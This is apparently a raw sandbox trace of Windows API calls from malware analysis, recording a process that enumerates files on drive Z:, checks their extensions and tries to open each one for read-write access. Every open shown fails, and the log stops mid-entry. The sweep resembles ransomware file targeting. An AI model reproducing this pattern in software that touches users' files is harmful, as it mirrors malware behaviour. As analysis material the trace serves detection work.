[0177.896] CreateFileW (lpFileName="Z:\\TSbSJ2ohxP3n6KDx.docx" (normalized: "z:\\tsbsj2ohxp3n6kdx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.898] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10a4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0EiP8svF6n.mkv", cAlternateFileName="")) returned 1 [0177.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.898] PathFindExtensionW (pszPath="Z:\\0EiP8svF6n.mkv") returned=".mkv" [0177.902] CreateFileW (lpFileName="Z:\\0EiP8svF6n.mkv" (normalized: "z:\\0eip8svf6n.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.903] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc4ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RS5pLVkA29znz.flv", cAlternateFileName="")) returned 1 [0177.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.903] PathFindExtensionW (pszPath="Z:\\RS5pLVkA29znz.flv") returned=".flv" [0177.907] CreateFileW (lpFileName="Z:\\RS5pLVkA29znz.flv" (normalized: "z:\\rs5plvka29znz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.908] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1683c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sYQ0h.ppt", cAlternateFileName="")) returned 1 [0177.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.908] PathFindExtensionW (pszPath="Z:\\sYQ0h.ppt") returned=".ppt" [0177.913] CreateFileW (lpFileName="Z:\\sYQ0h.ppt" (normalized: "z:\\syq0h.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.914] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5e17, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wucW1wawWx4ne.doc", cAlternateFileName="")) returned 1 [0177.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.914] PathFindExtensionW (pszPath="Z:\\wucW1wawWx4ne.doc") returned=".doc" [0177.918] CreateFileW (lpFileName="Z:\\wucW1wawWx4ne.doc" (normalized: "z:\\wucw1wawwx4ne.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.920] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14d3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eiiY7fvtLx3dj.bmp", cAlternateFileName="")) returned 1 [0177.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.920] PathFindExtensionW (pszPath="Z:\\eiiY7fvtLx3dj.bmp") returned=".bmp" [0177.924] CreateFileW (lpFileName="Z:\\eiiY7fvtLx3dj.bmp" (normalized: "z:\\eiiy7fvtlx3dj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.925] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x92e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1AikB2DT.mp3", cAlternateFileName="")) returned 1 [0177.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.925] PathFindExtensionW (pszPath="Z:\\1AikB2DT.mp3") returned=".mp3" [0177.929] CreateFileW (lpFileName="Z:\\1AikB2DT.mp3" (normalized: "z:\\1aikb2dt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.930] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x121c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WmEY4gv.mp3", cAlternateFileName="")) returned 1 [0177.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.931] PathFindExtensionW (pszPath="Z:\\WmEY4gv.mp3") returned=".mp3" [0177.934] CreateFileW (lpFileName="Z:\\WmEY4gv.mp3" (normalized: "z:\\wmey4gv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.936] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17418, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8MxVvSu2W.gif", cAlternateFileName="")) returned 1 [0177.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.936] PathFindExtensionW (pszPath="Z:\\8MxVvSu2W.gif") returned=".gif" [0177.940] CreateFileW (lpFileName="Z:\\8MxVvSu2W.gif" (normalized: "z:\\8mxvvsu2w.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.941] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15140, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8iKtd3z.mp3", cAlternateFileName="")) returned 1 [0177.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.941] PathFindExtensionW (pszPath="Z:\\8iKtd3z.mp3") returned=".mp3" [0177.945] CreateFileW (lpFileName="Z:\\8iKtd3z.mp3" (normalized: "z:\\8iktd3z.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.946] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16666, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cOTqEVjblHM.odt", cAlternateFileName="")) returned 1 [0177.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.946] PathFindExtensionW (pszPath="Z:\\cOTqEVjblHM.odt") returned=".odt" [0177.951] CreateFileW (lpFileName="Z:\\cOTqEVjblHM.odt" (normalized: "z:\\cotqevjblhm.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.952] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17424, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GhhNZic0YcS.png", cAlternateFileName="")) returned 1 [0177.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.952] PathFindExtensionW (pszPath="Z:\\GhhNZic0YcS.png") returned=".png" [0177.957] CreateFileW (lpFileName="Z:\\GhhNZic0YcS.png" (normalized: "z:\\ghhnzic0ycs.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.960] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2AX71T.jpg", cAlternateFileName="")) returned 1 [0177.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.960] PathFindExtensionW (pszPath="Z:\\2AX71T.jpg") returned=".jpg" [0177.965] CreateFileW (lpFileName="Z:\\2AX71T.jpg" (normalized: "z:\\2ax71t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.966] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2653c835, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xec1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="05s7FICPdDH4QU4JQ.pptx", cAlternateFileName="")) returned 1 [0177.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.966] PathFindExtensionW (pszPath="Z:\\05s7FICPdDH4QU4JQ.pptx") returned=".pptx" [0177.972] CreateFileW (lpFileName="Z:\\05s7FICPdDH4QU4JQ.pptx" (normalized: "z:\\05s7ficpddh4qu4jq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.973] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb860, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BcxN84fCWe8tEtN.mp3", cAlternateFileName="")) returned 1 [0177.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.973] PathFindExtensionW (pszPath="Z:\\BcxN84fCWe8tEtN.mp3") returned=".mp3" [0177.978] CreateFileW (lpFileName="Z:\\BcxN84fCWe8tEtN.mp3" (normalized: "z:\\bcxn84fcwe8tetn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.979] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11abe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3fGbugRdy.doc", cAlternateFileName="")) returned 1 [0177.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.979] PathFindExtensionW (pszPath="Z:\\3fGbugRdy.doc") returned=".doc" [0177.983] CreateFileW (lpFileName="Z:\\3fGbugRdy.doc" (normalized: "z:\\3fgbugrdy.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.984] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa150, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U04chup9Htp9GaipvVKU.mp3", cAlternateFileName="")) returned 1 [0177.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.984] PathFindExtensionW (pszPath="Z:\\U04chup9Htp9GaipvVKU.mp3") returned=".mp3" [0177.989] CreateFileW (lpFileName="Z:\\U04chup9Htp9GaipvVKU.mp3" (normalized: "z:\\u04chup9htp9gaipvvku.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.990] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11bd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSC3rM0mAZRze.gif", cAlternateFileName="")) returned 1 [0177.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.990] PathFindExtensionW (pszPath="Z:\\TSC3rM0mAZRze.gif") returned=".gif" [0177.994] CreateFileW (lpFileName="Z:\\TSC3rM0mAZRze.gif" (normalized: "z:\\tsc3rm0mazrze.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.996] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd97e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NoWCllIvB.mp4", cAlternateFileName="")) returned 1 [0177.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.996] PathFindExtensionW (pszPath="Z:\\NoWCllIvB.mp4") returned=".mp4" [0178.002] CreateFileW (lpFileName="Z:\\NoWCllIvB.mp4" (normalized: "z:\\nowcllivb.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.003] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe2cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BJt1dICMT7jI.odt", cAlternateFileName="")) returned 1 [0178.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.003] PathFindExtensionW (pszPath="Z:\\BJt1dICMT7jI.odt") returned=".odt" [0178.008] CreateFileW (lpFileName="Z:\\BJt1dICMT7jI.odt" (normalized: "z:\\bjt1dicmt7ji.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.009] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x115fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bRONRhxfJSt.mkv", cAlternateFileName="")) returned 1 [0178.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.009] PathFindExtensionW (pszPath="Z:\\bRONRhxfJSt.mkv") returned=".mkv" [0178.015] CreateFileW (lpFileName="Z:\\bRONRhxfJSt.mkv" (normalized: "z:\\bronrhxfjst.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.016] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa9c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mkCTvFrcP2kSnJz4.csv", cAlternateFileName="")) returned 1 [0178.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.016] PathFindExtensionW (pszPath="Z:\\mkCTvFrcP2kSnJz4.csv") returned=".csv" [0178.022] CreateFileW (lpFileName="Z:\\mkCTvFrcP2kSnJz4.csv" (normalized: "z:\\mkctvfrcp2ksnjz4.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.023] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17c72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yFhoJ6DLxdB.gif", cAlternateFileName="")) returned 1 [0178.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0178.023] PathFindExtensionW (pszPath="Z:\\yFhoJ6DLxdB.gif") returned=".gif" [0178.029] CreateFileW (lpFileName="Z:\\yFhoJ6DLxdB.gif" (normalized: "z:\\yfhoj6dlxdb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0178.033] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: 